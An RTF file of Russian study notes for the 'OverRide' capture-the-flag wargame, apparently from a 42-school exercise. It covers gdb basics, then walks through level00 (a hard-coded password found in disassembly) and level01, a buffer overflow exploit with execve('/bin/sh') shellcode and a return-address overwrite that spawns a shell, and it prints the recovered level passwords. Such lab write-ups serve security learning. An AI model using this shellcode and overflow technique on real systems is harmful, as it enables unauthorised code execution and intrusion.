{\rtf1\ansi\ansicpg1251\cocoartf1671\cocoasubrtf600
{\fonttbl\f0\fswiss\fcharset0 Helvetica;\f1\fnil\fcharset0 HelveticaNeue-Bold;\f2\fnil\fcharset0 HelveticaNeue;
\f3\fswiss\fcharset0 Helvetica-Bold;\f4\fnil\fcharset0 Menlo-Regular;\f5\froman\fcharset0 TimesNewRomanPS-BoldMT;
\f6\froman\fcharset0 TimesNewRomanPSMT;\f7\froman\fcharset0 TimesNewRomanPS-ItalicMT;\f8\fnil\fcharset0 Monaco;
\f9\fnil\fcharset0 Verdana-Bold;\f10\fnil\fcharset0 Verdana;\f11\fnil\fcharset0 Tahoma;
}
{\colortbl;\red255\green255\blue255;\red38\green38\blue38;\red255\green255\blue255;\red60\green60\blue59;
\red250\green252\blue255;\red0\green0\blue173;\red0\green0\blue0;\red184\green184\blue184;\red38\green38\blue38;
\red251\green2\blue255;\red0\green0\blue0;}
{\*\expandedcolortbl;;\cssrgb\c20000\c20000\c20000;\cssrgb\c100000\c100000\c100000;\cssrgb\c30196\c30196\c29804;
\cssrgb\c98431\c99216\c100000;\cssrgb\c0\c0\c73333;\cssrgb\c0\c0\c0;\cssrgb\c77255\c77255\c77255;\cssrgb\c19608\c19608\c19608;
\cssrgb\c100000\c25279\c100000;\csgray\c0\c0;}
{\*\listtable{\list\listtemplateid1\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{none\}}{\leveltext\leveltemplateid1\'00;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid1}
{\list\listtemplateid2\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{disc\}}{\leveltext\leveltemplateid101\'01\uc0\u8226 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid2}
{\list\listtemplateid3\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{none\}}{\leveltext\leveltemplateid201\'00;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid3}}
{\*\listoverridetable{\listoverride\listid1\listoverridecount0\ls1}{\listoverride\listid2\listoverridecount0\ls2}{\listoverride\listid3\listoverridecount0\ls3}}
\margl1440\margr1440\vieww32400\viewh24360\viewkind0
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5760\tx6480\tx7200\tx7920\tx8640\pardirnatural\partightenfactor0

\f0\fs32 \cf0 15.09.2021\
ssh -p 2222 level01@localhost\
\
**********************************************\
\uc0\u1055 \u1088 \u1086 \u1073 \u1088 \u1086 \u1089  \u1087 \u1086 \u1088 \u1090 \u1086 \u1074 
\fs24 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls1\ilvl0
\f1\b\fs32 \cf2 \cb3 		\expnd0\expndtw0\kerning0
\uc0\u1055 \u1086 \u1088 \u1090  \u1093 \u1086 \u1089 \u1090 \u1072 
\f2\b0 \'a0\'96 \uc0\u1083 \u1102 \u1073 \u1086 \u1081  \u1089 \u1074 \u1086 \u1073 \u1086 \u1076 \u1085 \u1099 \u1081  \u1087 \u1086 \u1088 \u1090  \u1042 \u1072 \u1096 \u1077 \u1075 \u1086  \u1082 \u1086 \u1084 \u1087 \u1100 \u1102 \u1090 \u1077 \u1088 \u1072 ,\
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls1\ilvl0\cf2 \kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\uc0\u1082 \u1086 \u1090 \u1086 \u1088 \u1099 \u1081  \u1073 \u1091 \u1076 \u1077 \u1090  \u1080 \u1089 \u1087 \u1086 \u1083 \u1100 \u1079 \u1086 \u1074 \u1072 \u1090 \u1100 \u1089 \u1103  \u1076 \u1083 \u1103  \u1087 \u1077 \u1088 \u1077 \u1085 \u1072 \u1087 \u1088 \u1072 \u1074 \u1083 \u1077 \u1085 \u1080 \u1103  \u1085 \u1072  \u1085 \u1091 \u1078 \u1085 \u1099 \u1081  \u1087 \u1086 \u1088 \u1090 \
\ls1\ilvl0\kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\uc0\u1074  \u1075 \u1086 \u1089 \u1090 \u1077 \u1074 \u1086 \u1081  \u1054 \u1057 . \u1053 \u1072 \u1087 \u1088 \u1080 \u1084 \u1077 \u1088 , 2222;\cb1 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls1\ilvl0
\f1\b \cf2 \cb3 \kerning1\expnd0\expndtw0 		\
		\expnd0\expndtw0\kerning0
IP \uc0\u1075 \u1086 \u1089 \u1090 \u1103 
\f2\b0 \'a0\'96 \uc0\u1079 \u1076 \u1077 \u1089 \u1100  \u1091 \u1082 \u1072 \u1079 \u1099 \u1074 \u1072 \u1077 \u1084  IP \u1072 \u1076 \u1088 \u1077 \u1089  \u1075 \u1086 \u1089 \u1090 \u1077 \u1074 \u1086 \u1081  \u1086 \u1087 \u1077 \u1088 \u1072 \u1094 \u1080 \u1086 \u1085 \u1085 \u1086 \u1081  \u1089 \u1080 \u1089 \u1090 \u1077 \u1084 \u1099 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls1\ilvl0\cf2 \kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\uc0\u1085 \u1072  \u1082 \u1086 \u1090 \u1086 \u1088 \u1099 \u1081  \u1073 \u1091 \u1076 \u1077 \u1090  \u1087 \u1088 \u1086 \u1080 \u1089 \u1093 \u1086 \u1076 \u1080 \u1090 \u1100  \u1087 \u1077 \u1088 \u1077 \u1085 \u1072 \u1087 \u1088 \u1072 \u1074 \u1083 \u1077 \u1085 \u1080 \u1077  (10.2.0.15)\
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls1\ilvl0\cf2 \cb1 \kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls1\ilvl0
\f1\b \cf2 \cb3 \kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\uc0\u1055 \u1086 \u1088 \u1090  \u1075 \u1086 \u1089 \u1090 \u1103 
\f2\b0 \'a0\'96 \uc0\u1087 \u1086 \u1088 \u1090  \u1075 \u1086 \u1089 \u1090 \u1077 \u1074 \u1086 \u1081  \u1054 \u1057 , \u1085 \u1072  \u1082 \u1086 \u1090 \u1086 \u1088 \u1099 \u1081  \u1085 \u1072 \u1084  \u1085 \u1077 \u1086 \u1073 \u1093 \u1086 \u1076 \u1080 \u1084 \u1086 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls1\ilvl0\cf2 \kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\uc0\u1087 \u1088 \u1086 \u1073 \u1088 \u1072 \u1089 \u1099 \u1074 \u1072 \u1090 \u1100  \u1085 \u1072 \u1096 \u1080  \u1079 \u1072 \u1087 \u1088 \u1086 \u1089 \u1099 . \u1042  \u1085 \u1072 \u1096 \u1077 \u1084  \u1089 \u1083 \u1091 \u1095 \u1072 \u1077  \u1101 \u1090 \u1086  4242 \u1087 \u1086 \u1088 \u1090 , \u1082 \u1086 \u1090 \u1086 \u1088 \u1099 \u1081 \
\ls1\ilvl0\kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\uc0\u1087 \u1088 \u1086 \u1089 \u1083 \u1091 \u1096 \u1080 \u1074 \u1072 \u1077 \u1090  SSH \u1089 \u1077 \u1088 \u1074 \u1077 \u1088 .\
\pard\tx720\pardeftab720\qj\partightenfactor0
\cf2 \cb1 \
\uc0\u1050 \u1086 \u1084 \u1072 \u1085 \u1076 \u1099 \
\pard\pardeftab720\sl320\partightenfactor0

\f3\b\fs28 \cf2 \cb3 objdump\
coredump 
\f0\b0 - \uc0\u1086 \u1073 \u1088 \u1072 \u1079  \u1087 \u1072 \u1084 \u1103 \u1090 \u1080  \u1074  \u1084 \u1086 \u1084 \u1077 \u1085 \u1090  \u1082 \u1086 \u1075 \u1076 \u1072  \u1087 \u1088 \u1086 \u1094 \u1077 \u1089 \u1089  \u1091 \u1087 \u1072 \u1083 \
\pard\pardeftab720\sl320\partightenfactor0

\f4 \cf4 \cb5 x/i - \uc0\u1080 \u1085 \u1089 \u1090 \u1088 \u1091 \u1082 \u1094 \u1080 \u1103 \
x/x - hex\
x/s - \uc0\u1089 \u1090 \u1088 \u1086 \u1082 \u1072 \
x/a - \uc0\u1072 \u1076 \u1088 \u1077 \u1089 \
\pard\pardeftab720\sl360\partightenfactor0

\fs26 \cf6 \cb3 mov \uc0\u1087 \u1088 \u1080 \u1077 \u1084 \u1085 \u1080 \u1082 , \u1080 \u1089 \u1090 \u1086 \u1095 \u1085 \u1080 \u1082  (\u1082 \u1086 \u1087 \u1080 \u1088 \u1086 \u1074 \u1072 \u1085 \u1080 \u1077 )\
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl320\qj\partightenfactor0
\ls2\ilvl0
\f5\b\fs28 \cf7 \cb1 \kerning1\expnd0\expndtw0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
ESI/SI
\f6\b0 \'a0(
\f7\i source index register
\f6\i0 ) \'96 \uc0\u1080 \u1085 \u1076 \u1077 \u1082 \u1089  \u1080 \u1089 \u1090 \u1086 \u1095 \u1085 \u1080 \u1082 \u1072 ;\
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl320\qj\partightenfactor0
\ls2\ilvl0
\f5\b \cf7 \kerning1\expnd0\expndtw0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
EDI/DI
\f6\b0 \'a0(
\f7\i destination index register
\f6\i0 ) \'96 \uc0\u1080 \u1085 \u1076 \u1077 \u1082 \u1089  \u1087 \u1088 \u1080 \u1105 \u1084 \u1085 \u1080 \u1082 \u1072  (\u1087 \u1086 \u1083 \u1091 \u1095 \u1072 \u1090 \u1077 \u1083 \u1103 );\
\pard\pardeftab720\sl340\partightenfactor0

\f2\fs30 \cf8 \cb9 \uc0\u1045 \u1089 \u1090 \u1100  \u1090 \u1088 \u1080  \u1086 \u1089 \u1085 \u1086 \u1074 \u1085 \u1099 \u1093  \u1088 \u1077 \u1075 \u1080 \u1089 \u1090 \u1088 \u1072  \u1082 \u1086 \u1090 \u1086 \u1088 \u1099 \u1077  \u1080 \u1089 \u1087 \u1086 \u1083 \u1100 \u1079 \u1091 \u1102 \u1090 \u1089 \u1103  \u1087 \u1088 \u1080  \u1088 \u1072 \u1073 \u1086 \u1090 \u1077 .\
* \uc0\u1056 \u1077 \u1075 \u1080 \u1089 \u1090 \u1088 \'a0
\f1\b EIP
\f2\b0 \'a0- \uc0\u1091 \u1082 \u1072 \u1079 \u1099 \u1074 \u1072 \u1077 \u1090  \u1085 \u1072  \u1072 \u1076 \u1088 \u1077 \u1089  \u1074  \u1087 \u1072 \u1084 \u1103 \u1090 \u1080 , \u1082 \u1072 \u1082 \u1072 \u1103  \u1080 \u1085 \u1089 \u1090 \u1088 \u1091 \u1082 \u1094 \u1080 \u1103  (\u1082 \u1086 \u1084 \u1072 \u1085 \u1076 \u1072 ) \u1076 \u1086 \u1083 \u1078 \u1085 \u1072  \u1074 \u1099 \u1087 \u1086 \u1083 \u1085 \u1080 \u1090 \u1089 \u1103  \u1089 \u1083 \u1077 \u1076 \u1091 \u1102 \u1097 \u1077 \u1081 .\
* \uc0\u1056 \u1077 \u1075 \u1080 \u1089 \u1090 \u1088 \'a0
\f1\b ESP
\f2\b0 \'a0- \uc0\u1091 \u1082 \u1072 \u1079 \u1099 \u1074 \u1072 \u1077 \u1090  \u1085 \u1072  \u1074 \u1077 \u1088 \u1096 \u1080 \u1085 \u1091  \u1089 \u1090 \u1077 \u1082 \u1072  (\u1072 \u1076 \u1088 \u1077 \u1089  \u1074  \u1087 \u1072 \u1084 \u1103 \u1090 \u1080 ).\
* \uc0\u1056 \u1077 \u1075 \u1080 \u1089 \u1090 \u1088 \'a0
\f1\b EBP
\f2\b0 \'a0- \uc0\u1091 \u1082 \u1072 \u1079 \u1099 \u1074 \u1072 \u1077 \u1090  \u1085 \u1072  \u1089 \u1090 \u1077 \u1082 \u1086 \u1074 \u1099 \u1081  \u1092 \u1088 \u1077 \u1081 \u1084  (\u1082 \u1072 \u1082  \u1087 \u1077 \u1088 \u1077 \u1084 \u1077 \u1085 \u1085 \u1099 \u1077  \u1080  \u1072 \u1088 \u1075 \u1091 \u1084 \u1077 \u1085 \u1090 \u1099  \u1088 \u1072 \u1089 \u1087 \u1086 \u1083 \u1072 \u1075 \u1072 \u1102 \u1090 \u1089 \u1103  \u1074  \u1087 \u1072 \u1084 \u1103 \u1090 \u1080 ).\
\
\pard\pardeftab720\sl360\partightenfactor0

\f8\fs27 \cf8 stepi
\f2\fs30 \'a0- \uc0\u1082 \u1086 \u1084 \u1072 \u1085 \u1076 \u1072  \u1074 \u1099 \u1087 \u1086 \u1083 \u1085 \u1080 \u1090  \u1088 \u1086 \u1074 \u1085 \u1086  \u1086 \u1076 \u1085 \u1091  \u1080 \u1085 \u1089 \u1090 \u1088 \u1091 \u1082 \u1094 \u1080 \u1102  \u1087 \u1088 \u1086 \u1094 \u1077 \u1089 \u1089 \u1086 \u1088 \u1072  \u1080  \u1086 \u1089 \u1090 \u1072 \u1085 \u1086 \u1074 \u1080 \u1090 \u1089 \u1103  \u1085 \u1072  \u1089 \u1083 \u1077 \u1076 \u1091 \u1102 \u1097 \u1077 \u1081 .\
\pard\pardeftab720\sl340\partightenfactor0
\cf8 \
\pard\pardeftab720\sl360\partightenfactor0

\f8\fs27 \cf8 nexti
\f2\fs30 \'a0\uc0\u1074 \u1099 \u1087 \u1086 \u1083 \u1085 \u1080 \u1090  \u1090 \u1086 \u1078 \u1077  \u1086 \u1076 \u1085 \u1091  \u1080 \u1085 \u1089 \u1090 \u1088 \u1091 \u1082 \u1094 \u1080 \u1102  \u1085 \u1086  \u1087 \u1077 \u1088 \u1077 \u1087 \u1088 \u1099 \u1075 \u1085 \u1077 \u1090 , \u1077 \u1089 \u1083 \u1080  \u1089 \u1083 \u1077 \u1076 \u1091 \u1102 \u1097 \u1072 \u1103  \u1080 \u1085 \u1089 \u1090 \u1088 \u1091 \u1082 \u1094 \u1080 \u1103  \u1073 \u1091 \u1076 \u1077 \u1090  \u1087 \u1086 \u1076 \u1087 \u1088 \u1086 \u1075 \u1088 \u1072 \u1084 \u1086 \u1081  - \u1092 \u1091 \u1085 \u1082 \u1094 \u1080 \u1077 \u1081  (call)\
\pard\pardeftab720\sl360\partightenfactor0

\fs32 \cf2 \cb1 \
\
\pard\pardeftab720\sl380\partightenfactor0

\f9\b \cf7 \cb3 \outl0\strokewidth0 \strokec7 \uc0\u1048 \u1085 \u1089 \u1090 \u1088 \u1091 \u1082 \u1094 \u1080 \u1103  RET
\f10\b0 \'a0\uc0\u1074  \u1040 \u1089 \u1089 \u1077 \u1084 \u1073 \u1083 \u1077 \u1088 \u1077  \u1074 \u1099 \u1087 \u1086 \u1083 \u1085 \u1103 \u1077 \u1090  \u1074 \u1086 \u1079 \u1074 \u1088 \u1072 \u1090  \u1080 \u1079  \u1073 \u1083 \u1080 \u1078 \u1085 \u1077 \u1081  \u1087 \u1088 \u1086 \u1094 \u1077 \u1076 \u1091 \u1088 \u1099  (
\f9\b RET
\f10\b0 URN)\

\f2 \cf2 \cb1 \outl0\strokewidth0 \
\pard\tx720\pardeftab720\qj\partightenfactor0
\cf2 1. \uc0\u1048 \u1079  \u1096 \u1077 \u1089 \u1090 \u1085 \u1072 \u1076 \u1094 \u1072 \u1090 \u1077 \u1088 \u1080 \u1095 \u1085 \u1099 \u1081  \u1074  \u1076 \u1077 \u1089 \u1103 \u1090 \u1080 \u1095 \u1085 \u1091 \u1102 :\

\f1\b (gdb) p 0x149c
\f2\b0 \
$4 = 5276\
\
2. \uc0\u1042 \u1099 \u1074 \u1077 \u1089 \u1090 \u1080  \u1088 \u1077 \u1075 \u1080 \u1089 \u1090 \u1088 \u1099 \

\f1\b (gdb) info r
\f2\b0 \
\
3. \uc0\u1042 \u1099 \u1074 \u1077 \u1089 \u1090 \u1080  \u1089 \u1086 \u1076 \u1077 \u1088 \u1078 \u1080 \u1084 \u1086 \u1077  \u1089 \u1090 \u1077 \u1082 \u1072 \

\f1\b (gdb) where\
\

\f2\b0 4. \uc0\u1058 \u1077 \u1082 \u1091 \u1097 \u1072 \u1103  \u1080 \u1085 \u1089 \u1090 \u1088 \u1091 \u1082 \u1094 \u1080 \u1103 
\f1\b \
(gdb) disas
\f2\b0 \
\
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls3\ilvl0\cf2 ******************************************************\
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls3\ilvl0\cf2 \kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls3\ilvl0
\f1\b \cf10 LEVEL00
\f2\b0 \cf2 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls3\ilvl0\cf2 \kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\
level00@OverRide:~$ ./level00\
***********************************\
* 	     -Level00 -		  *\
***********************************\
Password:\
\ls3\ilvl0\kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\
\uc0\u1042 \u1080 \u1076 \u1080 \u1084 , \u1095 \u1090 \u1086  \u1090 \u1088 \u1077 \u1073 \u1091 \u1077 \u1090 \u1089 \u1103  \u1074  \u1087 \u1072 \u1088 \u1086 \u1083 \u1100 .\
\ls3\ilvl0\kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\
$ gdb level00\
\ls3\ilvl0\kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\
\uc0\u1042  main \u1087 \u1088 \u1086 \u1080 \u1089 \u1093 \u1086 \u1076 \u1080 \u1090  \u1089 \u1088 \u1072 \u1074 \u1085 \u1077 \u1085 \u1080 \u1077  \u1089 \u1090 \u1088 \u1086 \u1082 \u1080 , \u1087 \u1086 \u1076 \u1072 \u1085 \u1085 \u1086 \u1081  \u1085 \u1072 \u1084 \u1080  \u1074  \u1082 \u1072 \u1095 \u1077 \u1089 \u1090 \u1074 \u1077  \
\uc0\u1087 \u1072 \u1088 \u1086 \u1083 \u1103  \u1089  0x149c, \u1095 \u1090 \u1086  \u1089 \u1086 \u1086 \u1090 \u1074 \u1077 \u1090 \u1089 \u1090 \u1074 \u1091 \u1077 \u1090   
\f11\fs28 \cf7 \cb3 5276 \uc0\u1074  \u1076 \u1077 \u1089 \u1103 \u1090 \u1080 \u1095 \u1085 \u1086 \u1081 .
\f2\fs32 \cf2 \cb1 \
\ls3\ilvl0\kerning1\expnd0\expndtw0 		\
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls3\ilvl0\cf2 \expnd0\expndtw0\kerning0
0x080484e7 <+83>:	cmp    $0x149c,%eax\
\pard\tx720\pardeftab720\qj\partightenfactor0
\cf2 \
\uc0\u1045 \u1089 \u1083 \u1080  \u1087 \u1086 \u1076 \u1072 \u1077 \u1090 \u1089 \u1103  \u1095 \u1090 \u1086 -\u1090 \u1086  \u1076 \u1088 \u1091 \u1075 \u1086 \u1077  \u1090 \u1086  \u1082 \u1086 \u1084 \u1072 \u1085 \u1076 \u1072  jne \u1087 \u1077 \u1088 \u1077 \u1073 \u1088 \u1072 \u1089 \u1099 \u1074 \u1072 \u1077 \u1090 \u1089 \u1103  \
\uc0\u1084 \u1080 \u1084 \u1086  \u1085 \u1077 \u1086 \u1073 \u1093 \u1086 \u1076 \u1080 \u1084 \u1086 \u1081  \u1082 \u1086 \u1084 \u1072 \u1085 \u1076 \u1099  system.\
\
0x080484ec <+88>:	 jne    0x804850d <main+121>\
\
$ ./level00\
***********************************\
* 	     -Level00 -		  *\
***********************************\
Password:5276\
\
Authenticated!\
\
$ cat /home/users/level01/.pass\
\pard\tx720\pardeftab720\qj\partightenfactor0
\cf10 \cb11 uSq2ehEGT6c9S24zbshexZQBXUGrncxn5sD5QfGL\
\
\
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0

\f1\b \cf10 \cb1 LEVEL01
\f2\b0 \cb11 \
\pard\tx720\pardeftab720\qj\partightenfactor0
\cf2 \cb1 \
 (cat /tmp/user ; cat) | ./level01\
\
python -c "print 'dat_wil' + '\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x89\\xc1\\x89\\xc2\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\x40\\xcd\\x80' + '\\n' + 'A'*80 + '\\x08\\x04\\xa0\\x47'[::-1]" > /tmp/test\
\
level01@OverRide:~$ cat /tmp/test - | ./level01\
\
whoami\
level02\
cat /home/users/level02/.pass\
PwBLgNa8p8MTKW57S7zxVAQCxnCpV8JqTTs9XEBv\
}